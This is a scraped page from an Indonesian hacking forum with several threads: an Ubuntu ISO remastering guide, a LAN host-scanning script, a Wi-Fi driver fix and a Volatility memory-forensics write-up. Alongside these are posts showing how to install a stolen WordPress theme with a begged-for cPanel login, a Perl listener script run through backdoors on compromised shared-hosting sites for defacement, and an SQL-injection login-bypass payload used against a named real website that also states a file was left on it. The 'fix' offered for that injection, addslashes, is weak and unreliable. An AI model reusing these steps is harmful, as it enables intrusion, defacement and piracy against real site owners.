Hello There, Guest! Register

Welcome, Guest
You have to register before you can post on our site.

Username
  

Password
  





Search Forums

(Advanced Search)

Forum Statistics
» Members: 28
» Latest member: dindinG41TR3
» Forum threads: 58
» Forum posts: 117

Full Statistics

Online Users
There are currently 3 online users.
» 0 Member(s) | 3 Guest(s)

Latest Threads
Remastering tool with Cub...
Forum: Remastering
Last Post: JLCNate
11-20-2017, 06:28 AM
» Replies: 0
» Views: 42
Mengetahui informasi yang...
Forum: Bash
Last Post: JLCNate
11-02-2017, 05:01 PM
» Replies: 0
» Views: 142
Installing realtek rtl872...
Forum: Fedora
Last Post: JLCNate
11-02-2017, 04:33 PM
» Replies: 0
» Views: 78
Mengatasi Masalah Install...
Forum: Design
Last Post: P4KyU
10-19-2017, 12:35 AM
» Replies: 0
» Views: 164
Patch Bug Di Website JASA...
Forum: PHP
Last Post: Catur Suranto
10-06-2017, 04:30 AM
» Replies: 2
» Views: 376
Seminal Nasional “Unmask ...
Forum: Event
Last Post: bifi
09-19-2017, 05:02 PM
» Replies: 0
» Views: 302
Port iLegal With Perl Soc...
Forum: Perl
Last Post: P4KyU
09-10-2017, 11:42 AM
» Replies: 0
» Views: 202
[Share] Memory analysis c...
Forum: Memory
Last Post: JLCNate
08-17-2017, 09:43 AM
» Replies: 0
» Views: 527
[trik] bypass file intern...
Forum: Microsoft Windows
Last Post: P4KyU
08-16-2017, 11:14 AM
» Replies: 0
» Views: 750
Cara Cari Curi
Forum: Ruby
Last Post: scriptKiddie
08-15-2017, 08:47 PM
» Replies: 2
» Views: 316

 
  Remastering tool with Cubic
Posted by: JLCNate - 11-20-2017, 06:28 AM - Forum: Remastering - No Replies

Cubic (Custom Ubuntu ISO Creator) is a GUI wizard to create a customized bootable Ubuntu Live CD (ISO) image. Cubic features an integrated command-line chroot environment, to make the customizations, and permits effortless navigation, backward and forward, through the ISO generation steps. You can create new customization projects or modify existing projects, and important parameters are automatically populated with intelligent defaults to simplify the customization process.

Installing Cubic

To install Cubic, add the PPA, and install using apt

Code:
$ sudo apt-add-repository ppa:cubic-wizard/release
$ sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 6494C6D6997C215E
$ sudo apt update
$ sudo apt install cubic


Using Cubic
Launch Cubic from the dock or application menu.
On the Cubic Introduction Page, select a directory to keep all your project files. You can have multiple customization projects, but you must pick a different directory for each project.

Quote:[Image: 9BOMvQGLT9uagtD41aczwQ.png]


Information on the New Project page will be automatically filled out for you. You can accept the recommended defaults. If you chose to change some of the values, related parameters will automatically be updated as you type.

Quote:[Image: xlPc6MdfTBe3CCjf9a-KHw.png]


The next page will display progress as the compressed Linux file system is extracted.

Quote:[Image: KsYFJLqMS3KD2rjHscrbdA.png]

[Image: c1nDvSaRRjqPNvCjeA-0CA.png]



The Terminal Page automatically appears once the Linux file system has been extracted. This is where you can make customizations. You will need to use the command line. Note that this is a chroot environment in which you are logged in as a root user, so you do not need to use sudo
when typing commands. (Note in Ubuntu 14.04, if you do not see the terminal prompt, press the Enter key a few times).

Use command line tools to customize Ubuntu.

Quote:[Image: a0LgxSH5SoagLFhAs5uX9A.png]

[Image: UDChif5dT4iAehF8FwdumA.png]


You can use apt to update sources and install applications. For example, you can install tools for solving case CTF like Codernate Linux v3 Gunange.

You can copy files or directories into the current directory by dragging them onto the terminal window. You can also copy files using the right-click context menu. This context menu also allows you to cut-and-paste text in the terminal.
Here is an example to copy additional wallpapers into your customized environment.

Code:
cd /usr/share/backgrounds


Then simply drag the new wallpapers onto the Cubic window.so they will be listed in the Change Background dialog when the user right-clicks on his/her desktop.
Note that the Cubic GUI currently does not support copying files over the network, but you can use the rcp or scp commends from within the terminal environment.

Quote:[Image: C2B1bkntR1GFGGrsE1n2wA.png]

[Image: 2wuGAEq2Roabm_8vwv8uIw.png]

[Image: 8-1Ns7vfQsyIV2t27mpP9A.png]


When you are done making your changes, click the Next button. Remember, you can always come back to the terminal environment for this project to make additional customizations in the future.

On the next page, you will see a list of additional kernels you may have installed to your customized Linux system, in the chroot environment. You can chose to use one of these as the boot kernel for your new live iso. (Note: On this page you are not selecting the kernel that is used inside your customized Linux system, nor are you selecting the kernel that will be installed onto a computer, using your new live iso). It's a good idea to just accept the recommended default on this page.

Quote:[Image: EaOyWC7YTM2euHu3XZKQQg.png]


After you click the Next button, you will see a list of all packages installed in your customized Linux system. The packages with a check mark next to them are flagged to be automatically removed by the "Ubiquity live CD installer". If you do not want Ubiquity to remove a package after installing your customized Linux system, simply un-check that package. Be careful when selecting packages for removal, because additional dependent packages may also be removed, and these will not be indicated in the list. Again, it's a good idea to just accept the recommended defaults on this page.


Quote:[Image: Rsux4kQkRhu0LIP0jvy8sg.png]

 
Cubic will automatically package your customizations into a new *.iso disk image. The progress and results of each step are shown. Note that Cubic uses maximum compression, and the "Compress the customized Linux filesystem" step may take a long time, depending on your system hardware. (You may want to open System Monitor to track your CPU utilization during this step).

At any time during this process, you can click the Back button to immediately go back to the chroot environment, and make additional changes or customizations you may have overlooked.

Quote:[Image: PpoOarstRd63qEEWMtZf5Q.png]


After generating the new customized disk image, Cubic will also generate an MD5 checksum file that can be used to verify your customized *.iso file.

Click the Finish button, and information about the customized disk image will be displayed.

If you want to continue customizing this project in the future, you must uncheck the "Delete all project files..." checkbox. Otherwise, all working project files will be deleted (in order to save disk space).

Finally, use your favorite disk burning program, such as Braseo, to burn a copy of the *.isoimage to CD or DVD, or use USB boot program, such as Startup Disk Creator or mkusb, to create a bootable USB.

Tip: If you are distributing your customized Linux, the corresponding MD5 checksum file can be used to verify that it has not been altered. For example, ensure both files are in the same directory, and type the following…

Code:
md5sum --check ubuntu-gnome-17.04.0-2017.06.24-desktop-amd64.md5

ubuntu-gnome-17.04.0-2017.06.24-desktop-amd64.iso: OK


Making Changes
Start Cubic, and select an existing project directory on the Introduction Page. Click the Next button, and you will be presented with three options:
  1. Create a new ISO image containing customizations you previously made
  2. Continue customizing your project to make additional changes
  3. Delete the project and start over. The project files take up disk space, so you may want to delete old files.
If you chose to delete the project, ALL project working files will be deleted. If the generated *.iso image is in the project directory, it will also be deleted, unless you manually move it.


Source :

Print this item

  Mengetahui informasi yang sedang online dari range IP
Posted by: JLCNate - 11-02-2017, 05:01 PM - Forum: Bash - No Replies

Banyak tool yang dapat digunakan untuk mengetahui ada berapa banyak yang sedang online dalam cakupan (range) IP tertentu. Misalnya dengan menggunakan nmap

Code:
$ nmap -sP 192.168.100.0/24


dalam pengujian yang saya lakukan pada range IP 192.168.100, maka diperoleh hasil sebagai berikut:


Code:
Nmap scan report for 192.168.100.1
Host is up (0.011s latency).
Nmap scan report for 192.168.100.8
Host is up (0.0030s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 15.67 seconds



Terlihat bahwa terdapat 2 host yang sedang online namun dengan menggunakan nmap saya merasa waktu yang dibutuhkan dalam memperoleh hasil cukup lama, saya coba lagi dengan tool lain yaitu Netdiscover


Code:
$ sudo netdiscover -i wlp2s0 -r 192.168.100.8/24


Hasil yang saya peroleh adalah
Code:
Currently scanning: Finished!   |   Screen View: Unique Hosts                            
                                                                                         
182 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 7662                        
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
-----------------------------------------------------------------------------
192.168.100.1   90:03:25:66:ee:cb      2      84  Unknown vendor                          
192.168.100.2   68:f7:28:b0:03:35      1      60  LCFC(HeFei) Electronics Technology co.,
192.168.100.67  bd:1b:81:00:0f:ff    179    7518  Unknown vendor

Terdapat 3 host yang aktif disana

Namun, apakah bisa dengan cara lain yang lebih cepat? Baiklah saya berikan kode yang saya peroleh dari hasil pencarian ketika sebelumnya saya hendak menginstall netdiscover pada sistem saya

Code:
#!/bin/sh
# Uncomment for debugging
#set -x
pingf(){
   if ping -w 2 -q -c 1 192.168.100."$1" > /dev/null ;
   then
    printf "IP %s is up\n" 192.168.100."$1"
   fi
}

main(){

   NUM=1
   while [ $NUM -lt 255  ];do
       pingf "$NUM" &
       NUM=$(expr "$NUM" + 1)
   done
   wait
}

main

Terlihat range IP yang saya set adalah 192.168.100 nilai $1 akan bertambah sesuai dengan penjumlahan nilai NUM yang dilakukan pada main
simpan dengan nama yang mudah anda ingat, disini saya simpan dengan nama pingin.sh

Untuk menjalankan tool tersebut gunakan perintah


Code:
$ sh pingin.sh



Maka hasil yang saya peroleh adalah

Code:
IP 192.168.100.1 is up
IP 192.168.100.8 is up


Quote:[Image: jAXJQZwsR_Sk84NwifWmRA.png]
Gambar hasil uji coba script

Terima kasih, semoga membantu teman-teman semua

Print this item

  Installing realtek rtl8723be driver for Fedora.
Posted by: JLCNate - 11-02-2017, 04:33 PM - Forum: Fedora - No Replies

Beberapa waktu ini saya mengalami persoalan dengan laptop HP saya yang baru. Salah satunya adalah wifi saya sangat lemah dalam menangkap signal wifi, saya terpaksa harus berdampingan dengan AP, bahkan terkadang harus menggunakan kabel agar terhubung ke jaringan. Saya pengguna Fedora workstation 26 dengan driver wifi realtek rtl8723be. Telah banyak artikel yang saya baca dan banyk driver saya terapkan pada sistem, namun tidak berjaan sesuai dengan yang saya harapkan.

Setelah membaca beberapa artikel lahi akhirnya saya berhasil menyelesaikan persoalan lemahnya sinyal wifi pada Fedora workstation 26 yang saya di HP 14-AM506TU

Cara pertama yang saya lakukan adalah dengan memastikan bahwa git telah terinstall pada fedora. Kemudahan yang diberikan Fedora adalah ketika menjalankan perintah dengan nama aplikasi tetapi aplikasi tersebut belum terdapat pada sistem maka fedora akan langsung menyarankan untuk menginstallnya, berbeda dengan Ubuntu yang hanya menunjukkan bahwa package tersebut belum teristall tanpa langsung memberikan optional penginstallan package.

Code:
$ sudo dnf install git


Catatan dari saya adalah sebaiknya pastikan juga kernel yang anda miliki adalah kernel terbaru 4.+

Code:
$ sudo apt-get install linux-headers-$(uname -r) gcc g++ build-essential dkms git


Lalu reboot

Jika sudah selanjutnya kita lakukan cloning terhadap file git yang berada di sini : https://github.com/lwfinger/rtlwifi_new

Code:
$ git clone https://github.com/lwfinger/rtlwifi_new.git


Selanjutnya lakukan pengisntallan driver

Code:
$ cd cd rtlwifi_new
$ make
$ sudo make install
$ sudo modprobe -rv rtl8723be


Jika pada tahapan modprobe masih tidak mendapatkan driver yang dimaksud coba ganti nilainya dengan 2 seperti ini

Code:
$ sudo modprobe -v rtl8723be ant_sel=2

Jika masih tidak bisa coba dengan nilai 1 atau 0

Selanjutnya kita tetapkan nilai menjadi parmanent

Code:
$ echo "options rtl8723be ant_sel=2 fwlps=0" | sudo tee /etc/modprobe.d/rtl8723be.conf


dan reload module nya

Code:
$ sudo modprobe -r rtl8723be
$ sudo modprobe rtl8723be


Sekarang wifi telah berjalan dengan sempurna dan lebih kuat dari sebelumnya

Quote:[Image: U-JE0hYySeOTaiwNob0wsQ.png]
Gambar 1. Sebelum Terinstall Driver



[Image: T3O5iKceRLCBOlWNb15t4g.png]
Gambar 2. Setelah Terinstall Driver


Ucapan terima kasih untuk penulis chirath02 yang telah melakukan experimen ini pada ubuntu dan aniketh01 yang memberi penjelasan secara keseluruhan untuk distribusi bervariasi. Terima kasih yang sangat spesial kepada lwfinger yang dengan dedikasinya telah menyediakan driver yang memberi manfaat bagi banyak orang termasuk saya.

Print this item

  Mengatasi Masalah Install themes wordpress premium hasil curian
Posted by: P4KyU - 10-19-2017, 12:35 AM - Forum: Design - No Replies

hi guys  Big Grin

kali ini ane mau share sedikit pengalaman tentang install tema curian pada  cms wordpress. 

jadi ceritanya, ane dapat tema premium/berbayar dari web sebelah. oh iya, anda bisa order jika anda suka
order : https://themeforest.net/item/boombox-vir...e/16596434 
demo : https://boombox.px-lab.com/  

lanjut ke pembahasan

ane iseng-iseng install tema di blog  bawaan wordpress dan tiba-tiba tampilannya kayak gini [WordPress Failure Notice]

[Image: pDn574anTKiSlqi0pJH49w.png]

atau mungkin anda pernah mengalami seperti gambar diatas.?
ane coba berulang-ulang kali akan tetapi hasilnya gagal. [ mungkin karena tema curian ] 

ok slow, setelah ane memohon perlindungan.. akhirnya dapat solusinya. 
solusinya karena blog bukan hasil curian jadi ane punya access cpanel, ya walaupun username dan password hasil ngemis. 

ok lanjut. buka CPANEL dan masuk ke menu FILE >FILEMANAGER 

[Image: uEsj3-_fQpWAOjmATPjVtw.png]

Di File Manager cPanel, masuk ke direktori public_html/blog/wp-content/themes lalu pilih menu Upload yang ada di pojok kiri atas, lalu upload file installer theme yang sudah ane curi sebelumnya exploit.zip

Quote:public_html/blog/wp-content/themes <= disesuaikan

lihat gambar dibawah

[Image: 0kV9TNJaRtWm5w2c1bFDuA.png]


Tunggu sampai proses selesai

[Image: gLTjxLyUQOu3dokRMdQVEw.png]
 
Setelah upload selesai, kembali ke File Manager, dan masuk ke lokasi public_html/blog/wp-content/themes, lalu klik  pada file installer themes (exploit.zip) dan pilih menu Extract.

[Image: fKj2ezO_TkODjp898xDglg.png]

[Image: 2g-kr2asRkiRBE2tXwRD-Q.png]

 Setelah proses extract selesai, sekarang masuk ke dashboard wp-admin, lalu masuk ke menu Appearance > Themes

[Image: AtSSLnJJRzWVMvlq5CX7Kg.png]



syalalalalalla .... tema hasil curian ter-install  Idea

Print this item

  Seminal Nasional “Unmask Cyber Crime” – Surabaya Hacker Link
Posted by: bifi - 09-19-2017, 05:02 PM - Forum: Event - No Replies

Seminal Nasional “Unmask Cyber Crime” – Surabaya Hacker Link

Mencuri uang & datamu, membobol servermu dan menyusupi gadgetmu adalah hal mudah bagi para pelaku Cyber Crime.

Siapa mereka? bagaimana mereka melakukannya?

JOIN THIS SHOW!


[Image: hOZzNsGXTRin5TbLlrGGog.jpg]


Ketua umum Zona IT Ternate, Jamz D. Mozac atau Muhammad Muzammil. Akan memberikan materi seminar di Surabaya pada akhir bulan Oktober 2017.


Untuk info lebih lanjut dan juga registrasi bisa alamat : Register

Print this item

  Port iLegal With Perl Socket
Posted by: P4KyU - 09-10-2017, 11:42 AM - Forum: Perl - No Replies

hi.. 
jumpa lagi, seperti judul thread diatas. 
ane mau share sedikit tetang beberapa website yang sempat 3njhuteam melakukan request port secara ilegal melalui script perl. 

Perl Script download socket.pl

Code:
#!/usr/bin/perl -w
use strict;
use IO::Socket;

sub Wait {
    wait; # wait needed to keep <defunct> pids from building up
}

$SIG{CHLD} = \&Wait;

my $server = IO::Socket::INET->new(
    LocalPort     => 1337, # set port
    Type         => SOCK_STREAM,
    Reuse         => 1,
    Listen         => 10) or die "$@\n";
my $client ;

while($client = $server->accept()) {
    select $client;
    print $client "HTTP/1.0 200 OK\r\n";
    print $client "Content-type: text/html\r\n\r\n";
    print $client '<title>opss
</title><H1>3nJhuTeam  ft. 2U</H1><BR><H2>Love Yourself</H2><embed src="http://www.youtube.com/v/iyMQRVA2pnc&amp;autoplay=1&amp;loop=1&amp;playlist=iyMQRVA2pnc" type="application/x-shockwave-flash" wmode="transparent" height="1" width="1"></embed>'; # set your html content
}
continue {
    close($client); #kills hangs
    kill CHLD => -$$;
}

bisa dilhat dari sini
Code:
my $server = IO::Socket::INET->new(
    LocalPort     => 1337, # set port
    Type         => SOCK_STREAM,


ada code yang tertulis new yang dimana code tersebut akan membuka port baru. dan localport disini listning port kita memakai port 1337. terseserah ya. sesuai selera anda saja. 

cara eksekusinya.? 
slow down. anda harus mempunyai akses shell/backdoor dari salah satu website. caranya.? not learning for upload shell, please search google for information backdoor site. 

sebagai contoh, ini adalah target untuk listning port ilegal. show ini belum di eksekusi.
[Image: A5-WHTP3SeyXS8-pQzBfzg.png]


cara eksekusi script perl. anggap saja saya udah mempunyai akses shell/backdoor pada target tersebut.

upload script perl tersebut dengan extensi pl atau test.pl lalu buka command pada shell/backdoor lalau jalankan dengan perintah 
Quote:perl test.pl

jika sudah menjalan script tersebut lalu buka salah satu website yang satu server shared dengan port yang telah diatur sebelumnya pada script perl. 
contohnya script tersebut kami menyimpan dengan nama socket.pl 
[Image: HJfsm9eEQPmA2q23laljLA.png]
untuk menentukan apakah script tersebut berjalan atau tidak bisa jalankan perintah ini di console
Quote:ps aux | grep 'perl'

ops scriptnya jalan.
[Image: IEXLglMdTTKocvIG-AXhAw.png]
kita cek apakah listning portnya berjalan. 
opss.. berhasil.... 
[Image: Q0gMJ1PbTMqjlQJ6akI5ag.png]

Referensi : http://www.binarytides.com/perl-socket-p...-tutorial/

Print this item

  Patch Bug Di Website JASAKODING.ID
Posted by: P4KyU - 08-23-2017, 11:38 AM - Forum: PHP - Replies (2)

Tercyduc!!


Hi, kali ini gue mau share sedikit tentang celah-celah kecil yang bisa membuat fatal pada website anda dalam tanda kutip " 

kemarin sempat kontak sama adminnya melalui email, tapi gak ada respon.. oke fine mungkin adminya kira hanya masalah sepele. 
padahal ada celah kecil yang bisa membuat seseorang bisa mengupload file yang sangat berbahaya berupa virus atau backdoor. 

Celah yang dimaksud antara lain adalah 
1. BYPASS ADMIN LOGIN SQL INJECTION 

pada kesempatan ini mba Natasya atau sering di kenal dengan m0m0 bertanya, kok wordpress bisa bypass admin login.? 
slow down,  letak bugnya ada pada subfolder, dan pada subfolder tidak memakai cms wordpress akan tetapi memakai kodingan php sendiri. 

code bypass admin login 

Quote:username : ' or 1=1 limit 1 -- -+
password : ' or 1=1 limit 1 -- -+

[Image: S1wQfjHdRKSjqyAWgp5uDg.png] 

[Image: EX31ewTzR3KcUiyo3eC4YA.png]


timbul pertanyaan kok bisa ya.?
ayo kita lihat isi kodingan dulu kenapa sampai bisa tanpa harus login menggunakan username dan password admin. 
PHP Code:
<?php
$username
=trim(strip_tags($_POST['username']));
    
$password=md5($_POST['password']);
    
$act=$_GET['act'];
    if(
$act=='lgn'){
        
$cek=mysql_query("select * from tbadmin where username='$username' and password='$password'");
        if(
mysql_num_rows($cek)==1){//jika berhasil akan bernilai 1
        
$c mysql_fetch_array($cek);
        
$_SESSION['rahasia'] = md5($c['username']);
        echo 
"<meta http-equiv='Refresh' content='0; URL=?'>";    
        }else{
    
?>
    <script type="text/javascript">
    alert('Data Login Anda salah, silahkan coba lagi !!!');
    </script> 

perhatikan pada code ini dengan metode bypass admin.
Code:
if(mysql_num_rows($cek)==1){//jika berhasil akan bernilai 1

bypass code 
Code:
' or 1=1 limit 1 -- -+

kemudian perhatikan code ini
Code:
$username=trim(strip_tags($_POST['username']));
    $password=md5($_POST['password']);


fungsi yang digunakan adalah strip_tags  
Quote:Strip_tags() : digunakan untuk menghilangkan karakter2 html dari value yg diinputkan

dalam hal ini cluenya bisa dilihat bahwa strip_tags menghilangkan karakter2 html dengan inputan id yang berupa angka bahkan berbagai karakter lainnya. 
berarti bisa dibilang tidak ada filter pada bagian inputan login. 

bagaimana cara mengatasinya.?
sebenarnya ada banyak cara, tergantung selera anda saja. 
disini saya menutup celah tersebut dengan code yang sengat pendek dan sederhana. 

saya hanya menggantikan fungsi strip_tags 
Code:
$username=trim(strip_tags($_POST['username']));
    $password=md5($_POST['password']);

dengan fungsi addslashes  
Code:
$username=addslashes(trim($_POST[username]));
    $password=md5($_POST['password']);

full code 
PHP Code:
<?php
$username
=addslashes(trim($_POST[username]));
    
$password=md5($_POST['password']);
    
$act=$_GET['act'];
    if(
$act=='lgn'){
        
$cek=mysql_query("select * from tbadmin where username='$username' and password='$password'");
        if(
mysql_num_rows($cek)==1){//jika berhasil akan bernilai 1
        
$c mysql_fetch_array($cek);
        
$_SESSION['rahasia'] = md5($c['username']);
        echo 
"<meta http-equiv='Refresh' content='0; URL=?'>";    
        }else{
    
?>
    <script type="text/javascript">
    alert('bug closed by codernate.org !!!');
    </script> 

setelah diganti dengan fungsi addslashes  
dan dicoba dengan metode yang sama alias bypass admin
Code:
' or 1=1 limit 1 -- -+


dan celahnya berhasil di tutup dengan fungsi addslashes
[Image: wzQmV8tZROSPdKk8ManUaA.png]

semoga thread ini bisa menjadi acuan untuk memperhatikan fungsi-fungsi kecil yang sangat rentan dan bisa membuat website anda di susupi oleh seseorang.


saya juga memberikan notif kepada admin melalui sebuah file yang saya titip. 
https://www.jasakoding.id/notif.htm

Referensi : http://php.net/manual/en/function.addcslashes.php

sekian untuk thread kali ini.
jangan lupa like fanspage kami : https://www.facebook.com/loading.gov 
dan profil kami                       : https://3njhuteam.github.io

Print this item

  [Share] Memory analysis challenge
Posted by: JLCNate - 08-17-2017, 09:43 AM - Forum: Memory - No Replies

Untuk kali ini aku coba share bagaimana melakukan analisis memori dengan menggunakan Volatility

Mari kita coba selesaikan beberapa poin dibawah ini:

  1. Identifikasi jenis OS-nya
  2. Identifikasi proses yang mencurigakan
  3. Identifikasi service yang mencurigakan
  4. Identifikasi remote IP yang mentriger proses tersebut
  5. Identifikasi tipe malware yang menginfeksi komputer tersebut
  6. Identifikasi apakah di komputer tersebut terinstall antivirus
  7. Temukan aplikasi atau service yang "vulnerable" yang mungkin dimanfaatkan oleh si hacker untuk masuk ke dalam komputer tersebut

Download filenya disini : RAM.7z


File yang kita peroleh adalah seperti ini

Code:
┌─[ Thu Aug 17 02:19:05 1 files, 512M
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  ll
total 512M
drwxr-xr-x 2 root root 4.0K Aug 17 02:18 ./
drwxr-xr-x 3 root root 4.0K Aug 17 02:18 ../
-rw-rw-rw- 1 root root 512M Apr 10  2014 RAM.mem


Dapat terlihat bahwa kapasitas dari file memory ini adalah 512MB dan dibuat pada 10 April 2014


Mari kita cek MD5 nya dengan menggunakan md5sum

Code:
┌─[ Thu Aug 17 02:24:44 1 files, 512M
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  md5sum RAM.mem
47ca9f4ef6549705a9337166ac45ea82  RAM.mem

MD5 : 47ca9f4ef6549705a9337166ac45ea82

Baik mari kita mulai lakukan analisis

Pastikan kamu sudah memiliki Volatility sebagai tool dalam melakukan analisa nanti



Identifikasi jenis OS

Untuk identifikasi jenis os nya kita dapat menggunakan Plugin imageinfo

Code:
volatility -f RAM.mem imageinfo


Berikut output yang dihasilkan

Code:
┌─[ Thu Aug 17 03:03:00 1 files, 512M
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  volatility -f RAM.mem imageinfo
Volatility Foundation Volatility Framework 2.6
INFO    : volatility.debug    : Determining profile based on KDBG search...
         Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
                    AS Layer1 : IA32PagedMemoryPae (Kernel AS)
                    AS Layer2 : FileAddressSpace (/root/Documents/Codernate/Forensics/Memory/RAM.mem)
                     PAE type : PAE
                          DTB : 0x311000L
                         KDBG : 0x80545ae0L
         Number of Processors : 1
    Image Type (Service Pack) : 3
               KPCR for CPU 0 : 0xffdff000L
            KUSER_SHARED_DATA : 0xffdf0000L
          Image date and time : 2014-04-10 06:30:00 UTC+0000
    Image local date and time : 2014-04-10 13:30:00 +0700


Quote:[Image: S26cT58ZSlmCcbKpaG7QmQ.png]


Perhatikan pada Suggested profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
dari sini, kita telah berhasil memperoleh informasi OS yang digunakan adalah Microsoft Windows XP.

Tapi kenapa ada muncul 2, WinXPSP2 Dan WinXPSP3? Ini dikarenakan profile yang tersedia dapat kita digunakan untuk melakukan kegiatan seperti melihat prosses, history dan sebagai nya pada versi jenis OS yang digunakan dengan menggunakan Volatility.[



Identifikasi proses yang mencurigakan

Untuk mengidentifikasi proses-proses yang mencurigakan misalnya malware dan proses lainnya kita dapat menggunakan plugin pslist, psscan atau pstree. Perintah yang dapat dijalankan adalah seperti ini
Code:
┌─[ Thu Aug 17 02:50:39 1 files, 512M
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  volatility -f RAM.mem --profile=WinXPSP2x86 pslist


--profile=WinXPSP2x86 adalah profil yang ditentukan dari suggest profile yang diperoleh sebelumnya, maka output yang dihasilkan adalah:

pslist

Quote:[Image: ShlzB-m0TWOTOv1AzsOqMw.png]


Perhatikan pada PID 1644 metsvc.exe, PID 584 wscript.exe dan PID 1760 qNPEwOBAwGzOSN.
Ketiga proses tersebut merupakan proses yang mencurigakan dikarenakan proses-proses ini biasanya merupakan proses yang berjalan ketika komputer sedang terkena serangan malware dari metasploit maupun virus atau trojan.
malware berjalan dari wscript.exe yg merupakan windows service yg berfungsi untuk menjalankan file Vbscript
Backdoor dibuat oleh wscript yang menjalankan file-file malicious lainnya yaitu qNPEwOBAwGzOSN.


Quote:We will now use the multi/handler with a payload of ‘windows/metsvc_bind_tcp’ to connect to the remote system. This is a special payload, as typically a Meterpreter payload is multi-stage, where a minimal amount of code is sent as part of the exploit, and then more is uploaded after code execution has been achieved. ~ Interacting with Metsvc, https://www.offensive-security.com/metas...ng-metsvc/



Identifikasi service yang mencurigakan

Disini saya menggunakan plugin svcscan untuk mendapatkan aktifitas sevice
perintah yang dijalankan adalah

Code:
┌─[ Thu Aug 17 03:03:00 1 files, 512M
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  volatility -f RAM.mem --profile=WinXPSP2x86 svcscan


Lihat apa yang kita peroleh pada offset : 0x385630, sebuah service yang biasanya digunakan untuk melakukan exploitasi dengan metasploit dengan Binary Path yang memiliki karakter aneh QeJPYErizYmFJn

Code:
Offset: 0x385630
Order: 100
Start: SERVICE_AUTO_START
Process ID: 1644
Service Name: metsvc
Display Name: Meterpreter
Service Type: SERVICE_INTERACTIVE_PROCESS, SERVICE_WIN32_OWN_PROCESS
Service State: SERVICE_RUNNING
Binary Path: "C:\DOCUME~1\WINVIC~1\LOCALS~1\Temp\QeJPYErizYmFJn\metsvc.exe" service


Quote:[Image: VAXQhZ2-SNyl5pJGqZkQRg.png]




Identifikasi remote IP yang mentriger proses

Pada tahapan ini kita akan menggunakan plugin connections dan connscan

Jalankan perintah berikut untuk connections

Code:
┌─[ Thu Aug 17 03:15:56 1 files, 512M
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  volatility -f RAM.mem --profile=WinXPSP2x86 connections



Maka output yang diperoleh adalah

Code:
┌─[ Thu Aug 17 03:15:56 1 files, 512M
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  volatility -f RAM.mem --profile=WinXPSP2x86 connections
Volatility Foundation Volatility Framework 2.6
Offset(V)  Local Address             Remote Address            Pid
---------- ------------------------- ------------------------- ---
0x821818a0 10.1.103.48:1069          192.168.88.44:443         1760
0x8245ce68 10.1.103.48:1049          10.1.103.47:443           1060


dan untuk connscan

Code:
┌─[ Thu Aug 17 03:19:02 1 files, 512M
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  volatility -f RAM.mem --profile=WinXPSP2x86 connscan


Maka output yang dihasilkan adalah

Code:
┌─[ Thu Aug 17 03:19:02 1 files, 512M
└─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  volatility -f RAM.mem --profile=WinXPSP2x86 connscan
Volatility Foundation Volatility Framework 2.6
Offset(P)  Local Address             Remote Address            Pid
---------- ------------------------- ------------------------- ---
0x021514b0 10.1.103.48:1071          10.1.103.47:4444          1872
0x021818a0 10.1.103.48:1069          192.168.88.44:443         1760
0x023f4008 10.1.103.48:1069          192.168.88.44:443         1760
0x0245ce68 10.1.103.48:1049          10.1.103.47:443           1060



Quote:[Image: mG9zxt-0QwKLEEg5DP55ZQ.png]


Terdapat 2 buah IP yang sedang berproses dan terkoneksi, dari kedua IP tersebut mari kita identifikasi IP mana yang merupakan IP yang mentriger proses dengan menggunakan plugin iehistory

Code:
 ┌─[ Thu Aug 17 03:50:43 2 files, 512M
 └─[ root@jlcnate:~/Documents/Codernate/Forensics/Memory ] -->  volatility -f RAM.mem --profile=WinXPSP3x86 iehistory
Volatility Foundation Volatility Framework 2.6
**************************************************
Process: 408 explorer.exe
Cache type "URL " at 0x1f15000
Record length: 0x100
Location: Visited: WINVICTIM@http://192.168.88.44:8080/payloads/trojan.exe
Last modified: 2014-03-04 03:44:00 UTC+0000
Last accessed: 2014-03-04 03:44:00 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0xac
**************************************************
Process: 408 explorer.exe
Cache type "URL " at 0x1f15100
Record length: 0x100
Location: Visited: WINVICTIM@http://192.168.88.44:8080/payloads
Last modified: 2014-03-04 03:43:49 UTC+0000
Last accessed: 2014-03-04 03:43:49 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0xa0
**************************************************
Process: 408 explorer.exe
Cache type "URL " at 0x1f15880
Record length: 0x100
Location: Visited: WINVICTIM@about:Home
Last modified: 2014-03-04 03:38:45 UTC+0000
Last accessed: 2014-03-04 03:38:45 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0x88
**************************************************
Process: 408 explorer.exe
Cache type "URL " at 0x1f15e80
Record length: 0x100
Location: Visited: WINVICTIM@file:///C:/Documents%20and%20Settings/WINVICTIM/My%20Documents/account.txt
Last modified: 2013-11-13 06:51:03 UTC+0000
Last accessed: 2013-11-13 06:51:03 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0xc8
**************************************************
Process: 408 explorer.exe
Cache type "URL " at 0x1f17b80
Record length: 0x100
Location: Visited: WINVICTIM@file:///C:/Documents%20and%20Settings/WINVICTIM/My%20Documents/account.txt
Last modified: 2014-04-10 05:58:25 UTC+0000
Last accessed: 2014-04-10 05:58:25 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0xc8
**************************************************
Process: 408 explorer.exe
Cache type "URL " at 0x1f17c80
Record length: 0x100
Location: Visited: WINVICTIM@file:///C:/Documents%20and%20Settings/WINVICTIM/Desktop/Setup.SED
Last modified: 2014-04-10 05:58:30 UTC+0000
Last accessed: 2014-04-10 05:58:30 UTC+0000
